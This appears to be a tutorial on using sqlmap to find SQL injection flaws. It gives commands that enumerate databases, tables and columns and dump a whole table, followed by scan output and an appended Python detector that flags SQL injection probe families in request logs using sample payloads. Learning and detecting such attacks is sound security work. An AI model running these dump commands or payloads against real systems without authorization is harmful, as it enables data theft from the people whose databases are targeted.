SQLMap is one of the best and best-known tools for scanning a web page for SQL injection vulnerabilities. It is very complete: you can be 99% sure that if there is a SQL injection vulnerability, this automated tool will find it.


Usage is pretty straightforward. Even though this tool can get very complex, I will explain only its normal usage.

Fetching database names
sqlmap -u "<target-url>" --method POST --data "password=pass&username=test" --dbs
Fetching table names knowing database name
sqlmap -u "<target-url>" --method POST --data "password=pass&username=test" --tables -D myDatabase
Describing a table knowing its name
sqlmap -u "<target-url>" --method POST --data "password=pass&username=test" --columns -D myDatabase -T myTable
Dumping whole table
sqlmap -u "<target-url>" --method POST --data "password=pass&username=test" --dump -D myDatabase -T myTable


Example output
 ___ ___[(]_____ ___ ___  {1.5.9#stable}
|_ -| . [']     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 18:28:29 /2021-12-21/

[18:28:29] [INFO] testing connection to the target URL
[18:28:29] [WARNING] the web server responded with an HTTP error code (403) which could interfere with the results of the tests
you have not declared cookie(s), while server wants to set its own ('JSESSIONID=9BA8C8CF8D6...80A16C352B'). Do you want to use those [Y/n] y
[18:28:34] [INFO] checking if the target is protected by some kind of WAF/IPS
[18:28:34] [INFO] testing if the target URL content is stable
[18:28:34] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] c
[18:28:35] [INFO] searching for dynamic content
[18:28:35] [INFO] dynamic content marked for removal (1 region)
[18:28:35] [INFO] testing if POST parameter 'password' is dynamic
[18:28:35] [WARNING] POST parameter 'password' does not appear to be dynamic
[18:28:35] [WARNING] heuristic (basic) test shows that POST parameter 'password' might not be injectable
[18:28:35] [INFO] testing for SQL injection on POST parameter 'password'
[18:28:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:28:35] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[18:28:35] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[18:28:35] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:28:35] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[18:28:35] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:28:35] [INFO] testing 'Generic inline queries'
[18:28:35] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:28:35] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:28:35] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:28:35] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[18:28:35] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:28:35] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[18:28:35] [INFO] testing 'Oracle AND time-based blind'
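
Seen from the server side, the run above shows up as one client sending several different probe families at the same POST parameter within seconds. The following is an added example, not part of the original post or of sqlmap: a heuristic detector over request-log records. The log format, client addresses, sample bodies, signature regexes and the three-family threshold are all assumptions made for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl

# Probe families named in the test list above, mapped to a heuristic signature
# (an assumption, not sqlmap's own payload list) matched on the decoded value.
SIGNATURES = {
    "boolean-based blind": re.compile(r"\b(?:AND|OR)\s+\d+\s*=\s*\d+", re.I),
    "error-based (EXTRACTVALUE)": re.compile(r"\bEXTRACTVALUE\s*\(", re.I),
    "time-based (SLEEP)": re.compile(r"\bSLEEP\s*\(", re.I),
    "time-based (DBMS_PIPE.RECEIVE_MESSAGE)": re.compile(r"\bDBMS_PIPE\.RECEIVE_MESSAGE\s*\(", re.I),
}

# Constructed sample records: "<timestamp> <client> <method> <path> <urlencoded body>".
SAMPLE_LOG = """\
2021-12-21T18:28:35Z 203.0.113.7 POST /login password=pass%27+AND+4521%3D4521--+-&username=test
2021-12-21T18:28:35Z 203.0.113.7 POST /login password=pass%27+AND+EXTRACTVALUE%281%2C1%29--+-&username=test
2021-12-21T18:28:36Z 203.0.113.7 POST /login password=pass%27+AND+SLEEP%285%29--+-&username=test
2021-12-21T18:29:02Z 198.51.100.20 POST /login password=sleep%28late%29+and+1+more&username=alice
2021-12-21T18:29:10Z 198.51.100.21 POST /login password=hunter2&username=bob
malformed line
"""

def scan(log_text):
    """Return {client: {(parameter, family), ...}} for every signature hit."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        fields = line.split(maxsplit=4)
        if len(fields) != 5 or fields[2] != "POST":
            continue  # skip malformed or non-POST records
        client, body = fields[1], fields[4]
        for param, value in parse_qsl(body, keep_blank_values=True):
            for family, pattern in SIGNATURES.items():
                if pattern.search(value):
                    hits[client].add((param, family))
    return dict(hits)

def likely_scanners(hits, min_families=3):
    """Clients that hit one parameter with >= min_families families (assumed threshold)."""
    flagged = {}
    for client, pairs in hits.items():
        per_param = defaultdict(set)
        for param, family in pairs:
            per_param[param].add(family)
        noisy = {p: sorted(f) for p, f in per_param.items() if len(f) >= min_families}
        if noisy:
            flagged[client] = noisy
    return flagged

if __name__ == "__main__": print(likely_scanners(scan(SAMPLE_LOG)))
```

A single signature hit, such as the constructed password that happens to contain `sleep(`, is recorded but not flagged; only the spread of families across one parameter is treated as a scan.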